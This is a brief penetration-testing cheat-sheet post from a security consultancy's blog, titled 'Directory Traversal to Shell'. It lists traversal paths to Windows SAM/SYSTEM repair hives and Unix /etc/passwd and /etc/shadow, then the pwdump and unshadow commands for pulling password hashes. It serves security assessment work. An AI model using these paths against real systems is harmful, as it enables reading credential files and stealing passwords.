Secure Network Management

hackers on your side

  • Why are you here?
  • Security Assessment
    • Incident Response
    • Regulations
  • Toolbox
    • Code
    • Default Password List
    • Threat Modeling
    • Tutorials
    • Vulnerability Disclosure
  • Knowledge Base
  • Contact

Directory Traversal to Shell

Posted by SNM on May 12, 2017

Summary

Directory Traversal to Shell Commands

Command

Windows
(your traversal here)/../windows/repair/sam
(your traversal here)/../windows/repair/system
pwdump system sam

*nix
(your traversal here)/../etc/passwd
(your traversal here)/../etc/shadow
unshadow passwd shadow

Description

Use an identified directory traversal to gain shell access. The Windows repair file is not present by default.
The unshadow and pwdump commands are installed by default on Kali Linux.

Nessus Plugin ID 10297

Posts navigation

← NTP Monlist Amplification Validation
Simple Python Web Server →
  • Recent Posts

    • Nexx 3020H Responder
    • Nexx 3020H LAN Dropbox Build – Comedy of Errors Edition
    • SMBv1 Scanner
    • 2018 Projects and Look Ahead
    • Weaponized Boredom
    • Knowledge Base Update
    • Automated tcpdump Script
  • Categories

    • Code
    • Threat Modeling
    • Tutorials
    • Uncategorized
    • Vulnerability Disclosure
    • Website Update
  • Archives

  • Site Search

Proudly powered by WordPress Theme: Parament by Automattic.